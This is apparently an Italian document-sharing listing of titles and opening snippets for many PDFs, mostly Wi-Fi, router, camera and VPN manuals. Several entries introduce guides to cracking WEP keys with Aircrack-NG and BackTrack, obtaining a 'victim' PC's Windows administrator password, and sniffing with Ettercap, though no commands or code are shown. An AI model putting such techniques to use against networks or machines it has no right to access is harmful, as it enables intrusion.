Internet Wireless in Biblioteca

Internet Wireless in Biblioteca Sistema Bibliotecario Valle Seriana Internet Wireless in Biblioteca Per poter accedere a Internet tramite il sistema WiFi della Biblioteca connettersi alla rete protetta che si chiama hotspot_biblioteca

Dettagli

Wireless USB 150 MANUALE UTENTE. Adattatore USB Wireless 802.11n HNWU150N. www.hamletcom.com

Wireless USB 150 MANUALE UTENTE. Adattatore USB Wireless 802.11n HNWU150N. www.hamletcom.com Wireless USB 150 Adattatore USB Wireless 802.11n MANUALE UTENTE HNWU150N www.hamletcom.com Indice dei contenuti INTRODUZIONE...4 CONTENUTO DELLA SCATOLA...4 INTRODUZIONE ALL ADATTATORE USB WIRELESS...4

Dettagli

www.avg.it Come navigare senza rischi

www.avg.it Come navigare senza rischi Come navigare senza rischi 01 02 03 04 05 06.Introduzione 01.Naviga in Sicurezza 02.Social Network 08.Cosa fare in caso di...? 22.Supporto AVG 25.Link e riferimenti 26 [02] 1.introduzione l obiettivo di

Dettagli

WARDRIVING WEP CRACK - by BigDaD

WARDRIVING WEP CRACK - by BigDaD 1 di 5 05/04/2008 14.59 www.wifi-ita.com La prima community Italiana sul WiFi MENU PRINCIPALE HOME FORUM CHAT REGISTRATI! è gratis! Teoria WiFi WARDRIVING WEP CRACK - by BigDaD Scritto da BigDaD martedì

Dettagli

ROUTER WIRELESS A BANDA LARGA 11N 300MBPS

ROUTER WIRELESS A BANDA LARGA 11N 300MBPS ROUTER WIRELESS A BANDA LARGA 11N 300MBPS Guida all'installazione rapida DN-70591 INTRODUZIONE DN-70591 è un dispositivo combinato wireless/cablato progettato in modo specifico per i requisiti di rete

Dettagli

2 Configurazione lato Router

2 Configurazione lato Router (Virtual Private Network), è un collegamento a livello 3 (Network) stabilito ed effettuato tra due o più reti LAN attraverso una rete pubblica che non deve essere necessariamente Internet. La particolarità

Dettagli

Rete Wireless del Comune di Padova

Rete Wireless del Comune di Padova Ricorda che per qualsiasi chiarimento gli operatori dell'informagiovani sono a tua disposizione nei seguenti orari: martedì e mercoledì dalle 10.00 alle 13.00 e dalle 15.00 alle 18.00 giovedì dalle 15.00

Dettagli

Guida pratica all utilizzo di Zeroshell

Guida pratica all utilizzo di Zeroshell Guida pratica all utilizzo di Zeroshell Il sistema operativo multifunzionale creato da Fulvio.Ricciardi@zeroshell.net www.zeroshell.net Proteggere una piccola rete con stile ( Autore: cristiancolombini@libero.it

Dettagli

Max Configurator v1.0

Max Configurator v1.0 NUMERO 41 SNC Max Configurator v1.0 Manuale Utente Numero 41 17/11/2009 Copyright Sommario Presentazione... 3 Descrizione Generale... 3 1 Installazione... 4 1.1 Requisiti minimi di sistema... 4 1.2 Procedura

Dettagli

Manuale configurazione rete, accesso internet a tempo e posta elettronica

Manuale configurazione rete, accesso internet a tempo e posta elettronica accesso internet a tempo e posta elettronica Indice 1. REQUISITI NECESSARI -------------------------------------------------------------------------- 4 1.1. PREDISPORRE I COLLEGAMENTI --------------------------------------------------------------------

Dettagli

IT Security 3 LA SICUREZZA IN RETE

IT Security 3 LA SICUREZZA IN RETE 1 IT Security 3 LA SICUREZZA IN RETE Una RETE INFORMATICA è costituita da un insieme di computer collegati tra di loro e in grado di condividere sia le risorse hardware (stampanti, Hard Disk,..), che le

Dettagli

Guida a CoinBeez v1.1 (da leggere TUTTA, almeno 3 volte)

Guida a CoinBeez v1.1 (da leggere TUTTA, almeno 3 volte) Guida a CoinBeez v1.1 (da leggere TUTTA, almeno 3 volte) Per utilizzare correttamente CoinBeez bisogna seguire una serie di passaggi, da farsi in sequenza uno dopo l altro. E altamente consigliato l utilizzo

Dettagli

Smart Guide ITALIANO. Versione: 3.2.5. netrd. etstart srl via Austria, 23/D - 35127 Padova (PD), Italy - info@etstart.it - www.etstart.

Smart Guide ITALIANO. Versione: 3.2.5. netrd. etstart srl via Austria, 23/D - 35127 Padova (PD), Italy - info@etstart.it - www.etstart. Smart Guide netrd ITALIANO Versione: 3.2.5 netrd è commercializzato da etstart srl via Austria, 23/D - 35127 Padova (PD), Italy - info@etstart.it - www.etstart.it 1 1 Descrizione Prodotto INDICE 1.1 Informazioni

Dettagli

Eureka Web. Connessione remota a centrali via Web

Eureka Web. Connessione remota a centrali via Web Eureka Web Connessione remota a centrali via Web Luglio 2013 2 Connessione remota a centrali via Web INDICE ACCESSO E UTILIZZO DEL PANNELLO DI CONTROLLO DI EUREKA WEB IMPOSTAZIONE DI EUREKA WEB Impostazione

Dettagli

Craccare reti WiFi senza fatica (versione per

Craccare reti WiFi senza fatica (versione per sicurezza.html.it ORIGINAL PAGE Craccare reti WiFi senza fatica (versione per la stampa) Articoli Sicurezza Craccare reti WiFi senza fatica Aircrack-NG è la più famosa suite di software dedicati al cracking

Dettagli

OwnCloud 8 su rete lan aziendale (una specie di Gdrive privato)

OwnCloud 8 su rete lan aziendale (una specie di Gdrive privato) Augusto Scatolini (webmaster@comunecampagnano.it) (a.scatolini@linux4campagnano.net) (campagnanorap@gmail.com) Miniguida n. 216 Ver. febbraio 2015 OwnCloud 8 su rete lan aziendale (una specie di Gdrive

Dettagli

CHIAVETTA INTERNET ONDA MT503HSA

CHIAVETTA INTERNET ONDA MT503HSA CHIAVETTA INTERNET ONDA MT503HSA Manuale Utente Linux Debian, Fedora, Ubuntu www.ondacommunication.com Chiavet ta Internet MT503HSA Guida rapida sistema operativo LINUX V 1.1 33080, Roveredo in Piano (PN)

Dettagli

GUIDA ALLA CONFIGURAZIONE DEL SERVIZIO

GUIDA ALLA CONFIGURAZIONE DEL SERVIZIO GUIDA ALLA CONFIGURAZIONE DEL SERVIZIO Gentile Cliente, ti ringraziamo per aver scelto il servizio Linkem. Attraverso i semplici passi di seguito descritti potrai da subito iniziare a sfruttare a pieno

Dettagli

Guida al cracking di chiavi wep

Guida al cracking di chiavi wep Guida al cracking di chiavi wep Ciao sono h4ck3r0n3 con questa guida intendo spiegare nel lato pratico come è possibile crackare una chiave wep per mezzo di BackTrack 3 e di un asus Eeepc. In breve vi

Dettagli

Ubiquity getting started

Ubiquity getting started Introduzione Il documento descrive I passi fondamentali per il setup completo di una installazione Ubiquity Installazione dei componenti Creazione del dominio Associazione dei dispositivi al dominio Versione

Dettagli

ORIEME ITALIA SpA Viale Sarca, 45 Telefono +39 02.64.41.16.1 Orieme Italia S.p.A. I-20125 Milano Telefax +39 02.64.36.990 www.orieme.

ORIEME ITALIA SpA Viale Sarca, 45 Telefono +39 02.64.41.16.1 Orieme Italia S.p.A. I-20125 Milano Telefax +39 02.64.36.990 www.orieme. Visio Wifi Setup - Android Rev. 1.0.0 L app dedicate Android consente di trasformare il vostro device in un vero e proprio pannello di controllo remoto, e di gestire Visio Wifi in tutta libertà, in casa

Dettagli

PIRELLI DISCUS DP-L10 GUIDA ALLA CONFIGURAZIONE EUTELIAVOIP

PIRELLI DISCUS DP-L10 GUIDA ALLA CONFIGURAZIONE EUTELIAVOIP PIRELLI DISCUS DP-L10 GUIDA ALLA CONFIGURAZIONE EUTELIAVOIP Pirelli Discus DP-L10 Guida alla Configurazione EUTELIAVOIP Rev1-0 pag.2 INDICE DUAL MODE PHONE DP-L10 PIRELLI...3 Principali caratteristiche

Dettagli

Guida rapida - rete casalinga (con router)

Guida rapida - rete casalinga (con router) Guida rapida - rete casalinga (con router) Questa breve guida, si pone come obiettivo la creazione di una piccola rete ad uso domestico per la navigazione in internet e la condivisione di files e cartelle.

Dettagli

ALICE. Manuale d uso

ALICE. Manuale d uso ALICE Manuale d uso Indice 1 INTRODUZIONE INDICE 2 1 INTRODUZIONE 3 2 REQUISITI DI SISTEMA 3 3 INSTALLAZIONE 4 3.1 Operazioni preliminari 4 3.2 Installazione di Alice 4 4 6 4.1 Avvio di Alice 6 4.2 Connessione

Dettagli

Guida rapida - rete casalinga (con router) Configurazione schede di rete con PC

Guida rapida - rete casalinga (con router) Configurazione schede di rete con PC Guida rapida - rete casalinga (con router) Questa breve guida, si pone come obiettivo la creazione di una piccola rete ad uso domestico per la navigazione in internet e la condivisione di files e cartelle.

Dettagli

Con accesso remoto s'intende la possibilità di accedere ad uno o più Personal Computer con un modem ed una linea telefonica.

Con accesso remoto s'intende la possibilità di accedere ad uno o più Personal Computer con un modem ed una linea telefonica. Tecnologie informatiche ACCESSO REMOTO CON WINDOWS Con accesso remoto s'intende la possibilità di accedere ad uno o più Personal Computer con un modem ed una linea telefonica. Un esempio di tale servizio

Dettagli

1. Il nome utente: NON può essere modificato 2. Il tuo nome (ne trovate prescritto uno generico): metti il tuo vero nome SENZA il cognome

1. Il nome utente: NON può essere modificato 2. Il tuo nome (ne trovate prescritto uno generico): metti il tuo vero nome SENZA il cognome Guida NetPupils Un social network è un sito che dà la possibilità alle persone di entrare in contatto e condividere informazioni. I social network si basano su quella che viene definita amicizia : concedendo

Dettagli

1. Servizio di accesso remoto con SSL VPN

1. Servizio di accesso remoto con SSL VPN Indice documento 1. Servizio di accesso remoto con SSL VPN 1 a. A chi è rivolto 1 b. Come funziona 1 c. Piattaforme supportate 1 d. Come si accede (Windows, Mac OS X, Linux) 2-3 2. Competente WSAM attivo

Dettagli

Raspberry Pi - Labolatorio Informatica

Raspberry Pi - Labolatorio Informatica Raspberry Pi - Labolatorio Informatica Indice 1 Prerequisiti 2 2 Installazione di Raspbian su scheda SD 2 2.1 Installazione con Linux...................................... 2 2.2 Installazione con Windows....................................

Dettagli

rapida Guida d installazione IP Camera senza fili/cablata Modello: FI8910W Modello: FI8910W Colore: Nera Colore: Bianco

rapida Guida d installazione IP Camera senza fili/cablata Modello: FI8910W Modello: FI8910W Colore: Nera Colore: Bianco IP Camera senza fili/cablata Guida d installazione rapida Modello: FI8910W Colore: Nera Modello: FI8910W Colore: Bianco Per Windows OS ------1 Per MAC OS ------15 ShenZhen Foscam Tecnologia Intelligente

Dettagli

Servizio di accesso remoto con SSL VPN

Servizio di accesso remoto con SSL VPN Servizio di accesso remoto con SSL VPN A chi è rivolto A tutti, sia attuali clienti RUN che hanno un collegamento tra la loro intranet aziendale e RUN, sia futuri clienti che vogliono accedere alla loro

Dettagli

IP Camera senza fili/cablata. Guida d installazione rapida (Per Windows OS) ShenZhen Foscam Tecnologia Intelligente Co., Ltd

IP Camera senza fili/cablata. Guida d installazione rapida (Per Windows OS) ShenZhen Foscam Tecnologia Intelligente Co., Ltd IP Camera senza fili/cablata Guida d installazione rapida (Per Windows OS) Modello: FI8916W Colore: Nera Modello: FI8916W Colore: Bianco ShenZhen Foscam Tecnologia Intelligente Co., Ltd Guida d installazione

Dettagli

RIPETITORE WIRELESS N 300MBPS

RIPETITORE WIRELESS N 300MBPS RIPETITORE WIRELESS N 300MBPS Guida rapida all'installazione DN-70181 Introduzione: DN-70181 e un ripetitore Wi-Fi con una combinazione dispositivo di connessione di rete cablato/wireless progettato specificamente

Dettagli

Configurazione router VoIP TeleTu P.RG A4101N

Configurazione router VoIP TeleTu P.RG A4101N Questo documento ti guiderà nella configurazione e nei collegamenti da effettuare, per iniziare da subito a navigare, telefonare e risparmiare con il nuovo router VoIP TeleTu! Contenuto della confezione

Dettagli

Implicazioni sociali dell informatica

Implicazioni sociali dell informatica Fluency Implicazioni sociali dell informatica Capitolo 10 Privacy I nostri corpi I nostri luoghi Le informazioni Le comunicazioni personali La privacy Con i moderni dispositivi è possibile violare la privacy

Dettagli

Sono disponibili client per Windows e MAC OS-X. https://sslvpn.unitus.it/sslvpn.html

Sono disponibili client per Windows e MAC OS-X. https://sslvpn.unitus.it/sslvpn.html 1. Introduzione. La seguente procedura per l utilizzo di una connessione VPN da casa si basa sul protocollo SSL (Secure Socket Layer) che viene utilizzato per garantire la protezione a livello di applicazione

Dettagli

GUIDA ALLA CONFIGURAZIONE DEL SERVIZIO

GUIDA ALLA CONFIGURAZIONE DEL SERVIZIO GUIDA ALLA CONFIGURAZIONE DEL SERVIZIO Gentile Cliente, ti ringraziamo per aver scelto il servizio Linkem. Attraverso i semplici passi di seguito descritti potrai da subito iniziare a sfruttare a pieno

Dettagli

Quando lancerete il browser di vostra scelta, indipendentemente dalla pagina inziale impostata apparirà questa schermata:

Quando lancerete il browser di vostra scelta, indipendentemente dalla pagina inziale impostata apparirà questa schermata: 1 Stabilite una connessione tra il vostro dispositivo wireless (notebook, smartphone, ipad o sim.) e la rete WiFree_1. Di norma, i dispsitivi wireless rilevano automaticamente le reti senza fili disponibili.

Dettagli

Il servizio Wireless permette ai Clienti FASTWEB di sfruttare al meglio la connessione a banda larga di FASTWEB evitando di cablare fisicamente l

Il servizio Wireless permette ai Clienti FASTWEB di sfruttare al meglio la connessione a banda larga di FASTWEB evitando di cablare fisicamente l Manuale WI-FI Il servizio Wireless permette ai Clienti FASTWEB di sfruttare al meglio la connessione a banda larga di FASTWEB evitando di cablare fisicamente l ambiente. Indice Introduzione 6 Controlla

Dettagli

GUIDA UTENTE INTERNET CAFE MANAGER (Vers. 5.2.0)

GUIDA UTENTE INTERNET CAFE MANAGER (Vers. 5.2.0) GUIDA UTENTE INTERNET CAFE MANAGER (Vers. 5.2.0) GUIDA UTENTE INTERNET CAFE MANAGER (Vers. 5.2.0)...1 Installazione e configurazione...2 Installazione ICM Server...3 Primo avvio e configurazione di ICM

Dettagli

Internet Wireless in Biblioteca

Internet Wireless in Biblioteca Internet Wireless in Biblioteca Per poter accedere a Internet tramite il sistema WiFi in Biblioteca bisogna connettersi alla rete protetta TILANE. Parametri per la connessione alla rete Connessione alla

Dettagli

PC Crash Course: OBIETTIVI

PC Crash Course: OBIETTIVI PC Crash Course: OBIETTIVI 1. PC: uno strumento 2. Microsoft Windows XP: alcuni concetti chiave della interfaccia grafica 3. File System: file, direttori, link, 4. Il prompt dei comandi 5. Un occhiata

Dettagli

Corso di Informatica Modulo L2 2-Installazione

Corso di Informatica Modulo L2 2-Installazione Corso di Informatica Modulo L2 2-Installazione 1 Prerequisiti Uso pratico elementare di un sistema operativo Concetto di macchina virtuale Scaricare e installare software 2 1 Introduzione Sebbene le istruzioni

Dettagli

La Sicurezza delle Reti. La Sicurezza delle Reti. Il software delle reti. Sistemi e tecnologie per la multimedialità e telematica.

La Sicurezza delle Reti. La Sicurezza delle Reti. Il software delle reti. Sistemi e tecnologie per la multimedialità e telematica. Sistemi e tecnologie per la multimedialità e telematica Fabio Burroni Dipartimento di Ingegneria dell Informazione Università degli Studi di Siena burronif@unisi unisi.itit La Sicurezza delle Reti La presentazione

Dettagli

Tecnica per help desk remoto

Tecnica per help desk remoto Tecnica per help desk remoto Guida scritta da Stefano Coletta (Creator) il 5 ottobre 2003 Contattatemi a creator@mindcreations.com o visitando http://www.mindcreations.com In breve Una soluzione multipiattaforma,

Dettagli

CPE Telsey Manuale d uso per utenti

CPE Telsey Manuale d uso per utenti Indice 1. ACCESSO ALLA CPE------------------------------------------------------------------------------ 3 2. DEVICE INFO ----------------------------------------------------------------------------------------

Dettagli

Guida all Utilizzo del Posto Operatore su PC

Guida all Utilizzo del Posto Operatore su PC Guida all Utilizzo del Posto Operatore su PC 1 Introduzione Indice Accesso all applicazione 3 Installazione di Vodafone Applicazione Centralino 3 Utilizzo dell Applicazione Centralino con accessi ad internet

Dettagli

www.siliceo.es WiFi-Repeater Manuale di istruzioni

www.siliceo.es WiFi-Repeater Manuale di istruzioni WiFi-Repeater Manuale di istruzioni ITALIANO Introduzione Il ripetitore WiFi è un dispositivo di connessione di rete cablata / wireless progettato specificamente per le piccole imprese, l'ufficio e la

Dettagli

CPE Genexis Manuale d uso per utenti

CPE Genexis Manuale d uso per utenti Indice 1. ACCESSO ALLA CPE------------------------------------------------------------------------------ 3 2. INFO ----------------------------------------------------------------------------------------------------

Dettagli

Internet: Connettività. conoscerlo al meglio per usarlo meglio. 2011 Gabriele Riva - Arci Barzanò

Internet: Connettività. conoscerlo al meglio per usarlo meglio. 2011 Gabriele Riva - Arci Barzanò Internet: conoscerlo al meglio per usarlo meglio Connettività Lezione 3 (connettività): Adsl, Router, Hub, Switch, Wi-Fi Modem GSM - Edge Umts Hsdpa Hsupa Reti Il file di hosts Adsl (Asymmetric Digital

Dettagli

DWL-122 Adattatore USB Wireless a 2.4GHz

DWL-122 Adattatore USB Wireless a 2.4GHz Il presente prodotto funziona con I seguenti sistemi operativi: Windows XP, Windows 2000, Windows Me, Windows 98SE, Macintosh OS X (10.2.x o superiore) Prima di cominiciare Il Computer Windows deve avere

Dettagli

EM4454 - Wireless USB Adapter

EM4454 - Wireless USB Adapter E EM4454 - Wireless USB Adapter 2 ITALIANO EM4454 - Wireless USB adapter Attenzione In base a leggi, direttive e regolamenti stabilite dall Unione Europea questo dispositivo può essere soggetto a limitazioni

Dettagli

VADEMECUM TECNICO. Per PC con sistema operativo Windows XP Windows Vista - Windows 7

VADEMECUM TECNICO. Per PC con sistema operativo Windows XP Windows Vista - Windows 7 VADEMECUM TECNICO Per PC con sistema operativo Windows XP Windows Vista - Windows 7 1) per poter operare in Server Farm bisogna installare dal cd predisposizione ambiente server farm i due file: setup.exe

Dettagli

Guida Wi-Fi Direct. Versione 0 ITA

Guida Wi-Fi Direct. Versione 0 ITA Guida Wi-Fi Direct Versione 0 ITA Modelli interessati Il presente manuale dell utente riguarda i seguenti modelli. HL-5470DW(T)/6180DW(T)/MFC-8710DW/8910DW/8950DW(T) Definizione delle note Nella presente

Dettagli

Password di Administrator in Windows 2000, XP e NT

Password di Administrator in Windows 2000, XP e NT Password di Administrator in Windows 2000, XP e NT In questa guida impareremo a ottenere la password di Administrator in un sistema basato su Windows 2000 o XP. Materiale: PC vittima con Win 2000 o Xp

Dettagli

Guida d installazione rapida

Guida d installazione rapida V38.01 IP Camera senza fili/cablata Guida d installazione rapida (Per MAC OS) FI8909/FI8909W ShenZhen Foscam Tecnologia Intelligente Co., Ltd Guida d installazione rapida Lista d imballaggio 1) IP CAMERA

Dettagli

Ettercap, analisi e sniffing nella rete. Gianfranco Costamagna. LinuxDay 2014. abinsula. October 25, 2014

Ettercap, analisi e sniffing nella rete. Gianfranco Costamagna. LinuxDay 2014. abinsula. October 25, 2014 Ettercap, analisi e sniffing nella rete Gianfranco Costamagna abinsula LinuxDay 2014 October 25, 2014 Chi siamo Abinsula un azienda specializzata in sistemi Embedded, Sicurezza Informatica e sviluppo di

Dettagli

<Portale LAW- Lawful Activities Wind > Pag. 1/33 Manuale Utente ( WEB GUI LAW ) Tipo di distribuzione Golden Copy (Copia n. 1) Copia n. Rev. n. Oggetto della revisione Data Pag. 2/33 SOMMARIO 1. INTRODUZIONE...

Dettagli

INDICE PROGRAMMA CORSO

INDICE PROGRAMMA CORSO INDICE PROGRAMMA CORSO PRIMA LEZIONE: Componenti di un computer: Hardware, Software e caratteristiche delle periferiche. SECONDA LEZIONE: Elementi principali dello schermo di Windows: Desktop, Icone, Mouse,

Dettagli

Controllo remoto di SPEEDY

Controllo remoto di SPEEDY UNIVERSITÀ DI BRESCIA FACOLTÀ DI INGEGNERIA Dipartimento di Elettronica per l Automazione Laboratorio di Robotica Avanzata Advanced Robotics Laboratory Corso di Robotica (Prof. Riccardo Cassinis) Controllo

Dettagli

Guida all Utilizzo dell Applicazione Centralino

Guida all Utilizzo dell Applicazione Centralino Guida all Utilizzo dell Applicazione Centralino 1 Introduzione Indice Accesso all applicazione 3 Installazione di Vodafone Applicazione Centralino 3 Utilizzo dell Applicazione Centralino con accessi ad

Dettagli

INCOMPATIBILITÀ VODAFONE MOBILE BROADBAND E WLAN IN WINDOWS 8.1 1

INCOMPATIBILITÀ VODAFONE MOBILE BROADBAND E WLAN IN WINDOWS 8.1 1 Gianluca ZG (ZG84) INCOMPATIBILITÀ VODAFONE MOBILE BROADBAND E WLAN IN WINDOWS 8.1 19 February 2014 Introduzione Questo articolo nasce dalla necessità di poter usufruire di una connessione internet, tramite

Dettagli

Migrazione di HRD da un computer ad un altro

Migrazione di HRD da un computer ad un altro HRD : MIGRAZIONE DA UN VECCHIO PC A QUELLO NUOVO By Rick iw1awh Speso la situazione è la seguente : Ho passato diverso tempo a impostare HRD e a personalizzare i comandi verso la radio, le frequenze preferite,

Dettagli

Istruzioni di configurazione

Istruzioni di configurazione Istruzioni di configurazione Videocamera serie HIT 57601 www.opera italy.com Contenuto della confezione : Opera Srl videocamera 57601 Collegare la videocamera ad internet Per la prima attivazione della

Dettagli

Virtual meeting istruzioni per l uso v 1.0 del 10 aprile 2012 - by LucioTS

Virtual meeting istruzioni per l uso v 1.0 del 10 aprile 2012 - by LucioTS Qui di seguito le istruzioni per partecipare ai virtual meeting 3rotaie. Il software (ad uso gratuito per scopi non commerciali) scelto è TeamViewer (scaricabile da http://www.teamviewer.com) che la momento

Dettagli

GUIDA PER LA CONNESSIONE ALLA RETE WIRELESS E ALL USO DEL SERVIZIO BERGAMO Wi-Fi

GUIDA PER LA CONNESSIONE ALLA RETE WIRELESS E ALL USO DEL SERVIZIO BERGAMO Wi-Fi GUIDA PER LA CONNESSIONE ALLA RETE WIRELESS E ALL USO DEL SERVIZIO BERGAMO Wi-Fi Requisiti necessari per l utilizzo di Bergamo Wifi: - Computer/Tablet/Smartphone dotato di interfaccia wireless - Disporre

Dettagli

Nel presente documento viene descritto il processo di installazione e configurazione del client 4Copy su una generica piattaforma Windows XP.

Nel presente documento viene descritto il processo di installazione e configurazione del client 4Copy su una generica piattaforma Windows XP. Nota: Nel presente documento viene descritto il processo di installazione e configurazione del client 4Copy su una generica piattaforma Windows XP. Capitolo 1 Installazione del Client... 2 Download del

Dettagli

Glossario ADSL Asymmetric Digital Subscriber Line ADSL2+ Asymmetric Digital Subscriber Line ADSL ADSL2+ Browser Un browser Client Un client

Glossario ADSL Asymmetric Digital Subscriber Line ADSL2+ Asymmetric Digital Subscriber Line ADSL ADSL2+ Browser Un browser Client Un client Glossario ADSL Asymmetric Digital Subscriber Line ADSL2+ Asymmetric Digital Subscriber Line ADSL è una tecnica di trasmissione dati che permette l accesso a Internet fino a 8 Mbps in downstream ed 1 Mbps

Dettagli

Realizzazione di un HotSpot su rete Fastweb con ZeroShell su VMWare

Realizzazione di un HotSpot su rete Fastweb con ZeroShell su VMWare Realizzazione di un HotSpot su rete Fastweb con ZeroShell su VMWare Il sistema operativo multifunzionale creato da Fulvio Riccardi www.zeroshell.net Autore: Antonio C. Hardware e software utilizzato: Pentium

Dettagli

Configurazione e installazione dei servizi Antea

Configurazione e installazione dei servizi Antea Configurazione e installazione dei servizi Antea Edizione: Dicembre 2014 Soggetto a variazioni e modifiche senza preavviso. Le immagini qui riportate si intendono a solo scopo esemplificativo: le apparecchiature

Dettagli

BREVE GUIDA ALL ATTIVAZIONE DEL SERVIZIO DDNS PER DVR SERIE TMX

BREVE GUIDA ALL ATTIVAZIONE DEL SERVIZIO DDNS PER DVR SERIE TMX BREVE GUIDA ALL ATTIVAZIONE DEL SERVIZIO DDNS PER DVR SERIE TMX Questa guida riporta i passi da seguire per la connessione dei DVR serie TMX ad Internet con indirizzo IP dinamico, sfruttando il servizio

Dettagli

ISTRUZIONI PASSO PASSO PER CREARE UN SITO CON JOOMLA SU ALTERVISTA

ISTRUZIONI PASSO PASSO PER CREARE UN SITO CON JOOMLA SU ALTERVISTA ISTRUZIONI PASSO PASSO PER CREARE UN SITO CON JOOMLA SU ALTERVISTA REGISTRARSI AL SITO ALTERVISTA, PER OTTENERE SPAZIO WEB GRATUITO o Andare sul sito it.altervista.org o Nel riquadro al centro, scrivere

Dettagli

Le reti Sicurezza in rete

Le reti Sicurezza in rete Le reti Sicurezza in rete Tipi di reti Con il termine rete si intende un insieme di componenti, sistemi o entità interconnessi tra loro. Nell ambito dell informatica, una rete è un complesso sistema di

Dettagli

Elementi di Sicurezza e Privatezza Laboratorio 6 - Sniffing. Chiara Braghin chiara.braghin@unimi.it

Elementi di Sicurezza e Privatezza Laboratorio 6 - Sniffing. Chiara Braghin chiara.braghin@unimi.it Elementi di Sicurezza e Privatezza Laboratorio 6 - Sniffing Chiara Braghin chiara.braghin@unimi.it Sniffing (1) Attività di intercettazione passiva dei dati che transitano in una rete telematica, per:

Dettagli

FRITZ!WLAN Repeater 300E. Come estendere la copertura della rete Wi-Fi

FRITZ!WLAN Repeater 300E. Come estendere la copertura della rete Wi-Fi Come estendere la copertura della rete Wi-Fi 1 Introduzione La crescente diffusione di dispositivi portatili per il collegamento ad Internet ha reso la connettività senza fili una caratteristica imprescindibile

Dettagli

Iniziamo ad utilizzare LiveBox ITALIANO. http://www.liveboxcloud.com

Iniziamo ad utilizzare LiveBox ITALIANO. http://www.liveboxcloud.com 2015 Iniziamo ad utilizzare LiveBox ITALIANO http://www.liveboxcloud.com Iniziamo ad utilizzare LiveBox LiveBox è un software di private cloud che permette di memorizzare, condividere e modificare i documenti

Dettagli

IP Camera senza fili/cablata. Guida d installazione rapida (Per Windows OS) ShenZhen Foscam Tecnologia Intelligente Co., Ltd

IP Camera senza fili/cablata. Guida d installazione rapida (Per Windows OS) ShenZhen Foscam Tecnologia Intelligente Co., Ltd IP Camera senza fili/cablata Guida d installazione rapida (Per Windows OS) Modello: FI8910W Colore: Nera Modello: FI8910W Colore: Bianco ShenZhen Foscam Tecnologia Intelligente Co., Ltd Guida d installazione

Dettagli

IP Camera senza fili/cablata Guida d installazione rapida (Per Windows OS)

IP Camera senza fili/cablata Guida d installazione rapida (Per Windows OS) IP Camera senza fili/cablata Guida d installazione rapida (Per Windows OS) ShenZhen Foscam Tecnologia Intelligente Co., Ltd Lista d imballaggio Guida d installazione rapida FI8904W FI8905WGuida d installazione

Dettagli

Wi-Pie Social Network Punti di accesso alla Rete Internet Manuale d'uso

Wi-Pie Social Network Punti di accesso alla Rete Internet Manuale d'uso Wi-Pie Social Network Punti di accesso alla Rete Internet Manuale d'uso INDICE 1. INTRODUZIONE...3 2. MODALITÀ DI ACCESSO AL SERVIZIO...3 2.1 CONFIGURAZIONE PER ACCESSO WI-FI...3 3. UTILIZZO DEL SERVIZIO...4

Dettagli

Vediamo come analizzare i pacchetti in transito su una rete con uno dei più celebri sniffer di matrice italiana: Ettercap.

Vediamo come analizzare i pacchetti in transito su una rete con uno dei più celebri sniffer di matrice italiana: Ettercap. Vediamo come analizzare i pacchetti in transito su una rete con uno dei più celebri sniffer di matrice italiana: Ettercap. La scelta è ricaduta su Ettercap in quanto, questo ottimo software, permette una

Dettagli

DSL-G604T Wireless ADSL Router

DSL-G604T Wireless ADSL Router Il presente prodotto può essere configurato con un browser web aggiornato come Internet Explorer 6 o Netscape Navigator 6.2.3. DSL-G604T Wireless ADSL Router Prima di cominciare 1. Se si intende utilizzare

Dettagli

INSTALLAZIONE E CONFIGURAZIONE OPENAFS E KERBEROS SU SISTEMI MICROSOFT (32bit)

INSTALLAZIONE E CONFIGURAZIONE OPENAFS E KERBEROS SU SISTEMI MICROSOFT (32bit) INSTALLAZIONE E CONFIGURAZIONE OPENAFS E KERBEROS SU SISTEMI MICROSOFT (32bit) STEP 1: Download dei file di installazione necessari Per il corretto funzionamento di AFS su sistemi a 32bt è necessario scaricare

Dettagli

LA SICUREZZA INFORMATICA SU INTERNET LE MINACCE

LA SICUREZZA INFORMATICA SU INTERNET LE MINACCE LE MINACCE I rischi della rete (virus, spyware, adware, keylogger, rootkit, phishing, spam) Gli attacchi per mezzo di software non aggiornato La tracciabilità dell indirizzo IP pubblico. 1 LE MINACCE I

Dettagli

IP Camera senza fili/cablata. Guida d installazione rapida (Per MAC OS) ShenZhen Foscam Tecnologia Intelligente Co., Ltd

IP Camera senza fili/cablata. Guida d installazione rapida (Per MAC OS) ShenZhen Foscam Tecnologia Intelligente Co., Ltd IP Camera senza fili/cablata Guida d installazione rapida (Per MAC OS) Modello: FI8916W Colore: Nera Modello: FI8916W Colore: Bianco ShenZhen Foscam Tecnologia Intelligente Co., Ltd Guida d installazione

Dettagli

DM-Learning MOO. Manuale del Docente

DM-Learning MOO. Manuale del Docente DM-Learning MOO Manuale del Docente DM-Learning MOO è un ambiente virtuale di supporto alle attività didattiche svolte in presenza, ed è gestita da DidatticaMente.net per l I.T.I.S. Zuccante di Venezia

Dettagli